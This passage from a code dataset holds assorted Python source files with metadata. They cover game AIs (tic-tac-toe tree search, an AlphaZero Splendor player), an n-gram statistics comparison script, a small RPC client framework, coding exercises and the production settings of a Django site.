vec2.reshape(1,s,s)\n A[4*i+3] = vec3.reshape(1,s,s)\n Ay[4*i] = tar \n Ay[4*i+1] = tar\n Ay[4*i+2] = tar \n Ay[4*i+3] = tar \n return A,Ay \n\n\n\n\n\n\ndef play_random(player1):\n '''\n It can be hard to tell the difference\n between improvement and randomness so\n a player can be made to play against\n random moves as a basic objective \n measure.\n '''\n board = make_board()\n player1_tree = mc.Node(value,policy,player1,board,'max',legal_moves,is_terminal,[])\n while True:\n mc.tree_search(player1_tree,num_searches=35)\n values = [c.value/c.N for c in player1_tree.children]\n move = np.argmax(values)\n player1_tree = player1_tree.children[move]\n board = player1_tree.state\n print('')\n print(board)\n print('')\n if is_win(board):\n print('ai win')\n break\n if is_draw(board):\n print('draw')\n break\n\n \n moves = legal_moves(board,'min')\n np.random.shuffle(moves)\n board = moves[0]\n print(board)\n if is_win(board)==-1:\n print('random wins')\n break \n if is_draw(board):\n print('draw')\n break\n \n n = [i for i in range(len(player1_tree.children)) if np.array_equal(player1_tree.children[i].state,board)]\n \n print(len(player1_tree.children))\n player1_tree = player1_tree.children[n[0]]\n\n\n\n","sub_path":"tictac.py","file_name":"tictac.py","file_ext":"py","file_size_in_byte":16933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"477069931","text":"import numpy as np\nfrom abstract_model import AbstractModel\nfrom nnet import NNet\n\nclass AlphaZero(AbstractModel):\n def __init__(self, state_encoder, exploration_rate, number_of_mcts_simulations):\n super().__init__(state_encoder)\n self.exploration_rate = exploration_rate\n self.number_of_mcts_simulations = number_of_mcts_simulations\n self.visited_states = set()\n self.examples = []\n self.P = {} #P[s][a] = policy value for move a in state s\n self.Q = {} #Q[s][a] = q-value of taking action a from state s\n self.N = {} #N[s][a] = number of times algorithm played action a from state s\n self.is_learning = False\n self.net = NNet(self.input_nodes, self.output_nodes)\n\n def simulate_game(self, env,depth=0):\n s = self.state_encoder.state_to_vector(env.return_state(False))\n if s not in self.visited_states:\n self.Q[s] = [0]*self.output_nodes\n self.N[s] = [0]*self.output_nodes\n \n if env.end or depth >= 200:\n return self.get_score_at_end_pos(env.current_player, env.winner)\n\n \n if s not in self.visited_states:\n self.visited_states.add(s)\n prediction = self.net.predict(s)\n self.P[s] = prediction[0][0]\n v = prediction[1][0][0]\n print(v)\n return v\n \n best_action = (-float(\"inf\"), -1)\n\n for action, avail in enumerate(self.state_encoder.available_outputs(env)):\n if avail:\n upper_confidence_bound = self.Q[s][action] + self.exploration_rate * self.P[s][action]*(sum(self.N[s])**0.5)/(1+self.N[s][action])\n best_action = max(best_action, (upper_confidence_bound, action))\n \n action = best_action[1]\n cur_player = env.current_player\n #print(\"moving\", self.output_to_move(action, env.return_state()))\n env.move(self.state_encoder.output_to_move(action, env.return_state()))\n player_after_move = env.current_player\n v = self.simulate_game(env,depth+1)\n if cur_player != player_after_move:\n v *= -1\n \n \n self.Q[s][action] = (self.N[s][action]*self.Q[s][action] + v)/(self.N[s][action]+1)\n self.N[s][action] += 1\n return v\n\n def get_pi(self, state):\n ns = np.array(self.N[state])\n if sum(ns) == 0:\n ns = np.ones(self.output_nodes)\n return ns/sum(ns)\n\n\n def get_scores_for_each_move(self,env):\n for _ in range(self.number_of_mcts_simulations):\n ecp = env.copy()\n result = self.simulate_game(ecp,0)\n #print('game_result = ',result)\n \n s = self.state_encoder.state_to_vector(env.return_state(False))\n pi = self.get_pi(s)\n if self.is_learning:\n self.examples.append((s, pi.copy(),None))\n return pi\n\n def get_best_move(self,env):\n state = env.return_state()\n aval_vector = self.state_encoder.available_outputs(env)\n raw_prediction = self.get_scores_for_each_move(env)\n prediction = raw_prediction * aval_vector\n assert sum(prediction) > 0\n prediction /= sum(prediction)\n #for i in range(len(prediction)):\n # assert prediction[i] == raw_prediction[i]\n return self.state_encoder.output_to_move(np.random.choice(len(prediction), p=prediction),state)\n\n\n def update_model_after_game(self,env):\n if self.is_learning:\n #abs(ex[0][0] - loser) is 1 if current player is winner, 0 is he lost and 0.5 if loser == 0.5\n self.examples = [(ex[0],ex[1], ex[2] if ex[2] is not None else self.get_score_at_end_pos(ex[0][0],env.winner)) for ex in self.examples]\n\n def produce_new_version(self):\n new_net = NNet(self.input_nodes, self.output_nodes)\n new_net.train(self.examples)\n\n az = AlphaZero(self.state_encoder, self.exploration_rate, self.number_of_mcts_simulations)\n az.net = new_net\n return az\n\n def get_score_at_end_pos(self,current_player, winner):\n if current_player == winner:\n return 1\n elif current_player == 1-winner:\n return -1\n return 0","sub_path":"splendor_ai/alpha_zero.py","file_name":"alpha_zero.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"114096620","text":"#CivObj Class & associated methods\r\n#Civ object is a localized entitity with x & y positions, plus \r\n\r\nimport random\r\nrandom.seed()\r\nimport WorldActor\r\n\r\nclass CivObj(WorldActor.WorldActor):\r\n r = None\r\n \r\n def __init__(self, xpos, ypos, radius):\r\n self.x = xpos\r\n self.y = ypos\r\n self.r = radius\r\n \r\ndef GenRandCiv(self, minr, maxr):\r\n newCivObj = CivObj(random.randint(0,100), random.randint(0,100), random.randint(minr,maxr))\r\n return newCivObj","sub_path":"adventure-mode/src/CivObj.py","file_name":"CivObj.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"128067305","text":"#In [1]:\n\nfrom scipy import stats\nfrom scipy.stats import ks_2samp\nimport numpy as np\nimport scipy as sp\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport xml.etree.cElementTree as ET\nimport xml.etree.ElementTree as etree\nimport os\nimport string\nfrom string import ascii_letters\nimport io\nimport re\nimport csv\nimport codecs\nimport datetime\nimport json, time, sys\nimport xml.etree.ElementTree as etree\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nimport wordsegment\nfrom wordsegment import load, segment\nimport splitter\nimport enchant, sys\nimport nltk, re, pprint\nfrom nltk import word_tokenize\n#from wordsegmentation import WordSegment\nfrom nltk import ngrams\nfrom nltk.corpus import stopwords\nfrom scipy import stats\nfrom scipy.stats import ks_2samp\nimport numpy as np\n\n\n\ndef jaccard(a,b):\n #a=a.split()\n #b=a.split()\n union = list(set(a+b))\n intersection = list(set(a) - (set(a)-set(b)))\n #print(\"Union - %s\" % union)\n #print(\"Intersection - %s\" % intersection)\n jaccard_coeff = float(len(intersection))/len(union)\n print(\"Jaccard Coefficient is = %f \" % jaccard_coeff)\n\n\n\n\n\ndef process_text(text): \n text = text.lower()\n text = text.replace('(', '')\n text = text.replace(',', '')\n text = text.replace(\"'\", '')\n # Convert text string to a list of words\n return text.split()\n\n\nwikidatalist=[]\nwikidataset={}\n\ntwitterdatalist=[]\ntwitterdataset={}\n\n\ndef getWikidataList():\n #with open('./wikidataprocessed/order20190613-130019.csv', 'r') as f:\n with open('./SimplifiedList.csv', 'r') as f:\n print('##### TRY ######')\n read = csv.reader(f) \n next(read)\n for line in read:\n lineitem = line[0].split()[0]\n item1 = process_text(lineitem)\n #print(item1[0])\n wikidatalist.append(item1[0])\n #print(wikidatalist)\n wikidataset = set(wikidatalist)\n #print(wikidataset)\n return wikidatalist\n\ndef getTwitterList1():\n with open('./orderedresultsngram1/count.csv', 'r') as f:\n print('##### TRY ######')\n read = csv.reader(f) \n next(read)\n for line in read:\n lineitem = line[0].split()[0]\n item1 = process_text(lineitem)\n #print(item1[0])\n twitterdatalist.append(item1[0])\n #print(twitterdatalist)\n #print(set(twitterdatalist))\n twitterdataset = set(twitterdatalist)\n #print(wikidataset)\n return twitterdatalist\n\n\ndef getTwitterList2():\n with open('./orderedresultsngram2/count.csv', 'r') as f:\n print('##### TRY ######')\n read = csv.reader(f) \n next(read)\n for line in read:\n lineitem = line[0].split()[0]\n item1 = process_text(lineitem)\n #print(item1[0])\n twitterdatalist.append(item1[0])\n #print(twitterdatalist)\n #print(set(twitterdatalist))\n twitterdataset = set(twitterdatalist)\n #print(wikidataset)\n return twitterdatalist\n\n\ndef getTwitterList3():\n with open('./orderedresultsngram3/count.csv', 'r') as f:\n print('##### TRY ######')\n read = csv.reader(f) \n next(read)\n for line in read:\n lineitem = line[0].split()[0]\n item1 = process_text(lineitem)\n #print(item1[0])\n twitterdatalist.append(item1[0])\n #print(twitterdatalist)\n #print(set(twitterdatalist))\n twitterdataset = set(twitterdatalist)\n #print(wikidataset)\n return twitterdatalist\n\ndef getTwitterList4():\n with open('./orderedresultsngram4/count.csv', 'r') as f:\n print('##### TRY ######')\n read = csv.reader(f) \n next(read)\n for line in read:\n lineitem = line[0].split()[0]\n item1 = process_text(lineitem)\n #print(item1[0])\n twitterdatalist.append(item1[0])\n #print(twitterdatalist)\n #print(set(twitterdatalist))\n twitterdataset = set(twitterdatalist)\n #print(wikidataset)\n return twitterdatalist\n\n\n#print(getWikidataList())\n#print(getTwitterList())\n\nwikidatalist = getWikidataList()\ntwitterData1 = getTwitterList1()\ntwitterData2 = getTwitterList2()\ntwitterData3 = getTwitterList3()\ntwitterData4 = getTwitterList4()\n\n#########################\n#STATS 1 \n########################\nprint('NGRAMS 1')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData1)\nprint(ks_statistic)\nprint(p_value)\n\nprint('NGRAMS 2')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData2)\nprint(ks_statistic)\nprint(p_value)\n\n\nprint('NGRAMS 3')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData3)\nprint(ks_statistic)\nprint(p_value)\n\n\nprint('NGRAMS 4')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData4)\nprint(ks_statistic)\nprint(p_value)\n\n\n\n#########################\n# STATS 2\n########################\n\ndef jaccard_similarity(list1, list2):\n intersection = len(list(set(list1).intersection(list2)))\n #print(list(set(list1).intersection(list2)))\n union = (len(list1) + len(list2)) - intersection\n return float(intersection / union)\n\nprint('NGRAMS 1')\nsimilarity1 = jaccard_similarity(wikidatalist, twitterData1)\ndistance1 = (1 - similarity1)\nprint('JJ similarity')\nprint(similarity1)\nprint('JJ distance')\nprint(distance1)\n\njaccard(wikidatalist, twitterData1)\n\nprint('NGRAMS 2')\nsimilarity2 = jaccard_similarity(wikidatalist, twitterData2)\ndistance2 = (1 - similarity2)\nprint('JJ similarity')\nprint(similarity2)\nprint('JJ distance')\nprint(distance2)\n\njaccard(wikidatalist, twitterData2)\n\nprint('NGRAMS 3')\nsimilarity3 = jaccard_similarity(wikidatalist, twitterData3)\ndistance3 = (1 - similarity3)\nprint('JJ similarity')\nprint(similarity3)\nprint('JJ distance')\nprint(distance3)\n\njaccard(wikidatalist, twitterData3)\n\nprint('NGRAMS 4')\nsimilarity4 = jaccard_similarity(wikidatalist, twitterData4)\ndistance4 = (1 - similarity4)\nprint('JJ similarity')\nprint(similarity4)\nprint('JJ distance')\nprint(distance4)\n\njaccard(wikidatalist, twitterData4)\n\n\n#%matplotlib inline\n#In [2]:\n\n#x = np.random.uniform(size=1000)\n#sigma_x = np.std(x)\n#mean_x = x.mean()\n\n#plt.hist(x)\n#plt.show()\n\n#In [3]:\n\n#y = x**4\n#sigma_y = np.std(y)\n#mean_y = y.mean()\n\n#plt.hist(y)\n#plt.show()\n\n","sub_path":"twitterwikidataprocessing/graphs/50/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"275828340","text":"# 2. 分解质因数,输入一个正整数,分解质因数:\n# 如:\n# 输入: 90\n# 打印:\n# 90=2*3*3*5\n# (质因数是指最小能被原数整数的素数(不包括1))\n\ndef is_prime(x):\n '''判断 x是否为素数'''\n if x <= 1:\n return False\n for i in range(2, x):\n if x % i == 0:\n return False\n return True\n\ndef get_prime_list(n):\n '''此函数根据给定一个整数,返回此整数所有因数的列表'''\n # 如何用n求出所有的因数\n L = [] # 用来存放所有因数(素数)\n # 如果n不是素数,我们就拆出因数出来\n while not is_prime(n):\n # 把n拆出来一个素数因数,然后继续循环\n # 找n的一个因数:\n for x in range(2, n):\n if is_prime(x) and n % x == 0:\n # x一定是n的因数\n L.append(x)\n n /= x # 下次再求n的因数\n n = int(n) # 转为整数\n break\n else:\n L.append(n)\n return L\n\nif __name__ == '__main__':\n n = int(input(\"请输入整数: \"))\n print(get_prime_list(n)) \n\n\n\n","sub_path":"第一阶段/4. Python03/day04/day03_exercise/02_zhiyinshu.py","file_name":"02_zhiyinshu.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321608987","text":"from flask import Flask, Blueprint\nfrom flask_socketio import SocketIO\nfrom redis import Redis\n# from . import app_controller\n\n\nmain = Blueprint('main', __name__)\napp = Flask(__name__,\n template_folder='../templates',\n static_folder='../static')\n# app.debug = debug\napp.register_blueprint(main)\nsocketio = SocketIO(app, async_mode=None)\nredis = Redis(host='redis', port=6379)\n#socketio.init_app(app)","sub_path":"src/app/py/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"33141327","text":"from itertools import combinations\nN,P,Q = map(int,input().split())\nA = list(map(int,input().split()))\nans = 0\n\n# for i in range(N):\n# for j in range(i+1,N):\n# for k in range(j+1,N):\n# for l in range(k+1,N):\n# for m in range(l+1,N):\n# if A[i]*A[j]%P*A[k]%P*A[l]%P*A[m]%P == Q:\n# ans += 1\n\nfor c in combinations(A,5):\n if c[0]*c[1]%P*c[2]%P*c[3]%P*c[4]%P == Q:\n ans += 1\n\nprint(ans)\n","sub_path":"tenkei90/055.py","file_name":"055.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"542943492","text":"from threading import Lock\nfrom component.ComponentBaseClass import ComponentBaseClass\n\n\nclass Buffer(ComponentBaseClass):\n def __init__(self, config):\n super().__init__(config)\n self.maxsize = config['maxsize']\n self.maxpolicy = config['maxpolicy']\n self.error = None\n self.info = None\n self.bufferempty = True\n self.bufferready = False\n self.bufferLock = Lock()\n self.buffer = {\n 'metadata': {\n 'deviceID': \"\"\n },\n 'data': {\n }\n }\n if 'database' in config:\n self.database = config['database']\n if config['type'] == 'local':\n self.typechoice = 0\n elif config['type'] == 'remote':\n self.typechoice = 1\n self.procedurecall = [self.localBuffer, self.remoteBuffer]\n\n def fillBuffer(self, data):\n self.procedurecall[self.typechoice](data)\n\n def process(self, data):\n try:\n if not self.bufferready:\n return None\n else:\n with self.bufferLock:\n self.bufferempty = True\n return self.buffer\n except (ValueError, Exception) as error:\n self.error = str(self.__class__) + \": \" + str(error)\n self.logger.exception(\"ERROR\")\n\n def localBuffer(self, data):\n with self.bufferLock:\n #if not self.buffer['meta']['deviceID']:\n if data['metadata']['deviceID']:\n self.buffer['metadata']['deviceID'] = data['metadata']['deviceID']\n if self.bufferempty:\n self.bufferempty = False\n self.buffer['data'] = {}\n for sensor in data['data']:\n self.buffer['data'][sensor] = []\n for valueset in data['data'][sensor]:\n self.buffer['data'][sensor].append(valueset)\n else:\n for sensor in data['data']:\n if sensor not in self.buffer['data'].keys():\n self.buffer['data'][sensor] = []\n for valueset in data['data'][sensor]:\n self.buffer['data'][sensor].append(valueset)\n self.bufferready = True\n\n def remoteBuffer(self, data):\n # to be implemented in next iteration\n pass\n","sub_path":"src/component/Buffer.py","file_name":"Buffer.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"286389795","text":"# 11652.py\n# 2018.06.06\n\nimport sys\n\np = list(map(int, sys.stdin.readlines()))\nanw, anw_cnt, cnt = p[0], 1, 1\np.sort()\n\nfor i in range(1, len(p)):\n\tcnt = 1 if p[i] != p[i-1] else cnt+1\n\tif cnt > anw_cnt:\n\t\tanw = p[i]\n\t\tanw_cnt = cnt\nprint(anw)\n\n# 정렬 후, 전 값과 비교하여 카운트해준다.\n","sub_path":"11000/11652.py","file_name":"11652.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"339291422","text":"# coding: utf8\n\n__all__ = [\"Stub\", \"Refer\"]\n__authors__ = [\"Tim Chow\"]\n\nimport inspect\nimport logging\nimport threading\nfrom functools import partial\n\nfrom .transport import *\nfrom .serializer import *\nfrom .cluster import *\nfrom .protocol import Protocol\nfrom .helper import *\nfrom .decorator import *\nfrom .connection import *\nfrom .request import Request\nfrom .exception import *\nfrom .heartbeat import *\nfrom .refer_argument import ReferArgument\nfrom .connection_pool import get_connection_from_pool\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Stub(object):\n def __init__(self):\n self._transport = None\n self._serializer = None\n self._cluster = None\n self._protocol = None\n\n def set_transport(self, transport):\n if not isinstance(transport, Transport):\n raise TypeError(\"expect Transport, not %s\" % type(transport).__name__)\n self._transport = transport\n return self\n\n def set_serializer(self, serializer):\n if not isinstance(serializer, Serializer):\n raise TypeError(\"expect Serializer, not %s\" % type(serializer).__name__)\n self._serializer = serializer\n return self\n\n def set_cluster(self, cluster):\n if not isinstance(cluster, Cluster):\n raise TypeError(\"expect Cluster, not %s\" % type(cluster).__name__)\n self._cluster = cluster\n return self\n\n def set_protocol(self, protocol):\n if not isinstance(protocol, Protocol):\n raise TypeError(\"expect Protocol, not %s\" % type(protocol).__name__)\n self._protocol = protocol\n return self\n\n def refer(self, class_object, refer_argument=None):\n if not inspect.isclass(class_object):\n raise TypeError(\"expect class, not %s\" % type(class_object).__name__)\n if refer_argument is None:\n refer_argument = ReferArgument()\n\n if self._transport is None:\n raise RuntimeError(\"transport must be provided\")\n if self._serializer is None:\n raise RuntimeError(\"serializer must be provided\")\n if self._cluster is None:\n raise RuntimeError(\"cluster must be provided\")\n if self._protocol is None:\n raise RuntimeError(\"protocol must be provided\")\n\n return Refer(class_object,\n self._transport,\n self._serializer,\n self._cluster,\n self._protocol,\n self.heartbeat_func,\n refer_argument)\n\n def close(self):\n if self._cluster is not None:\n self._cluster.close()\n self._cluster = None\n\n def heartbeat_func(self):\n class_name = HeartBeatRequest.__name__\n export = get_export(HeartBeatRequest)\n if export is not None:\n class_name = export[\"name\"]\n\n method_name = \"send\"\n provide = get_provide(HeartBeatRequest.send)\n if provide is not None:\n if provide[\"filtered\"]:\n raise RuntimeError(\"HeartBeatRequest.send is filtered\")\n method_name = provide[\"name\"]\n\n request = Request()\n request.class_name = class_name\n request.method_name = method_name\n request.args = tuple()\n request.kwargs = dict()\n request.meta = None\n\n return self._serializer.dumps(request)\n\n\nclass Refer(object):\n def __init__(self,\n class_object, # 被引用的类或接口\n transport, # 传输层\n serializer, # 序列化层\n cluster, # 集群层,用于负载均衡,包含Registry\n protocol, # 协议层,包含Filter和Invoker\n heartbeat_func, # 调用该函数,会返回序列化后的heartbeat请求\n refer_argument):\n self._class_object = class_object\n self._transport = transport\n self._serializer = serializer\n self._cluster = cluster\n self._heartbeat_func = heartbeat_func\n self._protocol = protocol\n self._refer_argument = refer_argument\n self._connection_pool = refer_argument.connection_pool_class(\n refer_argument.connection_pool_size,\n refer_argument.connections_per_key)\n\n self._class_name = self._class_object.__name__\n export = get_export(self._class_object)\n if export is not None:\n self._class_name = export[\"name\"]\n\n def __getattr__(self, attr_name):\n attr = getattr(self._class_object, attr_name, None)\n if attr is None:\n raise AttributeError(\"instance of %s has no attribute: %s\" % (\n self._class_object.__name__, attr_name))\n if not inspect.ismethod(attr):\n return attr\n\n method_name = attr_name\n provide = get_provide(attr)\n if provide is not None:\n if provide[\"filtered\"]:\n raise RuntimeError(\"method %s.%s is not exported\" %\n (self._class_name, attr_name))\n method_name = provide[\"name\"]\n return self._dynamic_proxy(method_name)\n\n def _connection_factory(self, host, port):\n sock = ClientSocketBuilder() \\\n .with_host(host) \\\n .with_port(port) \\\n .with_tcp_no_delay() \\\n .with_blocking() \\\n .with_timeout(self._refer_argument.client_socket_timeout) \\\n .build()\n connection = self._refer_argument.connection_class(sock,\n self._transport,\n self._refer_argument.max_pending_writes,\n self._refer_argument.max_pending_reads,\n self._refer_argument.max_pooling_reads,\n self._refer_argument.write_timeout,\n self._refer_argument.heartbeat_interval,\n self._heartbeat_func)\n return connection\n\n def _get_connnection_context(self, method_name):\n # 获取要连接到的远程服务的地址\n remote = self._cluster.get_remote(\n self._class_name,\n method_name,\n self._transport.get_name(),\n self._serializer.get_name())\n if remote is None:\n raise NoRemoteServerError(\n \"there is no remote server\")\n return get_connection_from_pool(\n self._connection_pool,\n remote,\n partial(self._connection_factory, remote[0], remote[1]))\n\n def _dynamic_proxy(self, method_name):\n def _inner(*args, **kwargs):\n # 生成Request对象\n request = Request()\n request.class_name = self._class_name\n request.method_name = method_name\n request.args = args\n request.kwargs = kwargs\n\n return self._protocol.invoke(\n request,\n self._get_connnection_context(method_name),\n self._serializer,\n self._refer_argument.write_timeout,\n self._refer_argument.read_timeout)\n return _inner\n\n def refer_close(self):\n # 关闭连接池\n self._connection_pool.close()\n\n","sub_path":"summerrpc/stub.py","file_name":"stub.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"252760660","text":"import os\nfrom setuptools import setup\n\n# Eigen version - peigen version\n__version__ = '0.0.9'\n\npackages = []\nfor root, dirs, files in os.walk('.'):\n if not root.startswith('./build') and '__init__.py' in files:\n packages.append(root[2:])\n\n#data_files = []\n#package_data = []\n#for root, dirs, files in os.walk(\"include\"):\n# root_files = [os.path.join(root, i) for i in files]\n# data_files.append((root, root_files))\n# for f in files:\n# package_data.append(os.path.join(root, f))\n\n#print(data_files)\n#print(package_data)\n\nsetup(\n name = 'peigen',\n packages = packages,\n version = __version__,\n description = 'Python wrapper for Eigen C++ header',\n author = 'Fred Moolekamp',\n author_email = 'fred.moolekamp@gmail.com',\n url = 'https://github.com/fred3m/peigen',\n keywords = ['eigen', 'numerical'],\n #package_data={\"peigen\":package_data},\n #data_files=data_files,\n zip_safe=False,\n include_package_data=True,\n)","sub_path":"pypi_install_script/peigen-0.0.9.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85455424","text":"import random\nfrom value_of_ace import *\nfrom sanitize_user_input import *\n\ndef userTurn(user_sum):\n want_to_play = \"yes\"\n hit_or_stand_input = input(\"Your current sum is \" + str(user_sum) + \". Would you like to stand or hit?\\n\")\n hit_or_stand = sanitizeInputForHitOrStand(hit_or_stand_input)\n\n while hit_or_stand == \"hit\":\n new_user_card = valueOfAce(random.randint(1, 10), user_sum)\n user_sum += new_user_card\n\n if user_sum > 21:\n want_to_play_input = input(\"Your current sum is \" + str(user_sum) + \". It looks like you bust!\\nDealer wins. Better luck next time!\\nWould you like to play again?\\n\")\n want_to_play = sanitizeInputForWantToPlay(want_to_play_input)\n break\n else:\n hit_or_stand_input = input(\"Your current sum is \" + str(user_sum) + \". Would you like to stand or hit?\\n\")\n hit_or_stand = sanitizeInputForHitOrStand(hit_or_stand_input)\n\n return user_sum, want_to_play\n\n\ndef dealerTurn(dealer_sum):\n final_dealer_sum = dealer_sum\n if dealer_sum > 16:\n print(\"Ok. The dealer's sum is \" + str(dealer_sum) + \". The dealer has decided to stand with a sum of \" + str(final_dealer_sum) + \".\")\n else:\n while final_dealer_sum <= 16:\n new_dealer_card = valueOfAce(random.randint(1, 10), final_dealer_sum)\n final_dealer_sum += new_dealer_card\n\n if final_dealer_sum > 21:\n print(\"Ok. The dealer's sum is \" + str(dealer_sum) + \". The dealer has decided to hit and busts with a sum of \" + str(final_dealer_sum) + \".\")\n else:\n print(\"Ok. The dealer's sum is \" + str(dealer_sum) + \". The dealer has decided to hit and stands with a sum of \" + str(final_dealer_sum) + \".\")\n\n return final_dealer_sum\n","sub_path":"player_turns.py","file_name":"player_turns.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"43144999","text":"# #!/usr/bin/env python3\n# # -*- coding: utf-8 -*-\n\n# đề bài: https://imgur.com/a/xb8Z5VF\n\narr = [2, 4, 1, 9, 8] # 25\narr = [1,2,3] # 7\narr.sort()\n\nSum = 1\nfor i in arr:\n\tSum = Sum + i\n\t\nif arr[0] != 1:\n\tprint(1)\nelse:\n\tminMoney = 0\n\tfor i in range(len(arr)-1):\n\t\tminMoney = minMoney + arr[i]\n\t\tif arr[i+1] > minMoney+1:\n\t\t\tprint(minMoney+1)\n\t\t\texit()\n\t\tprint(Sum)\n\t\texit()\n\t\t\t\n\n\n","sub_path":"leothang.py","file_name":"leothang.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"357749904","text":"from base import *\nimport dj_database_url\n\n\nDEBUG = False\n\nADMINS = [\n ('Phil Gyford', 'phil@gyford.com'),\n]\n\nMANAGERS = ADMINS\n\n# Uses DATABASE_URL environment variable:\nDATABASES = {'default': dj_database_url.config()}\nDATABASES['default']['CONN_MAX_AGE'] = 500\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.sendgrid.net'\nEMAIL_HOST_USER = get_env_variable('SENDGRID_USERNAME')\nEMAIL_HOST_PASSWORD = get_env_variable('SENDGRID_PASSWORD')\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\n# If you *don't* want to prepend www to the URL, remove the setting from\n# the environment entirely. Otherwise, set to 'True' (or anything tbh).\nPREPEND_WWW = True\n\n# See https://devcenter.heroku.com/articles/memcachier#django\nenviron['MEMCACHE_SERVERS'] = get_env_variable('MEMCACHIER_SERVERS').replace(',', ';')\nenviron['MEMCACHE_USERNAME'] = get_env_variable('MEMCACHIER_USERNAME')\nenviron['MEMCACHE_PASSWORD'] = get_env_variable('MEMCACHIER_PASSWORD')\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django_pylibmc.memcached.PyLibMCCache',\n\n # Use binary memcache protocol (needed for authentication)\n 'BINARY': True,\n\n # TIMEOUT is not the connection timeout! It's the default expiration\n # timeout that should be applied to keys! Setting it to `None`\n # disables expiration.\n 'TIMEOUT': None,\n\n 'OPTIONS': {\n # Enable faster IO\n 'tcp_nodelay': True,\n\n # Keep connection alive\n 'tcp_keepalive': True,\n\n # Timeout settings\n 'connect_timeout': 2000, # ms\n 'send_timeout': 750 * 1000, # us\n 'receive_timeout': 750 * 1000, # us\n '_poll_timeout': 2000, # ms\n\n # Better failover\n 'ketama': True,\n 'remove_failed': 1,\n 'retry_timeout': 2,\n 'dead_timeout': 30,\n }\n }\n}\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'null': {\n 'class': 'logging.NullHandler',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django.security.DisallowedHost': {\n 'handlers': ['null'],\n 'propagate': False,\n },\n }\n}\n\n# https\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\n# HSTS\nSECURE_HSTS_SECONDS = 31536000 # 1 year\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_PRELOAD = True\n\n# Sentry\n# https://devcenter.heroku.com/articles/sentry#integrating-with-python-or-django\n# via https://simonwillison.net/2017/Oct/17/free-continuous-deployment/# Step_4_Monitor_errors_with_Sentry_75\n\nSENTRY_DSN = os.environ.get('SENTRY_DSN')\n\nif SENTRY_DSN:\n INSTALLED_APPS += (\n 'raven.contrib.django.raven_compat',\n )\n RAVEN_CONFIG = {\n 'dsn': SENTRY_DSN,\n 'release': os.environ.get('HEROKU_SLUG_COMMIT', ''),\n }\n\n\n#############################################################################\n# PEPYSDIARY-SPECIFIC SETTINGS.\n\nGOOGLE_ANALYTICS_ID = 'UA-89135-2'\n\n# From https://www.google.com/recaptcha/\nRECAPTCHA_PUBLIC_KEY = get_env_variable('RECAPTCHA_PUBLIC_KEY')\nRECAPTCHA_PRIVATE_KEY = get_env_variable('RECAPTCHA_PRIVATE_KEY')\nRECAPTCHA_USE_SSL = True\n\n# Do we use Akismet/TypePad spam checking?\n# True/False. If false, no posted comments are checked.\n# If True, AKISMET_API_KEY must also be set.\nUSE_SPAM_CHECK = get_env_variable('USE_SPAM_CHECK')\n\n# From http://akismet.com/\nAKISMET_API_KEY = get_env_variable('AKISMET_API_KEY')\n\n# From http://mapbox.com/\nMAPBOX_MAP_ID = get_env_variable('MAPBOX_MAP_ID')\nMAPBOX_ACCESS_TOKEN = 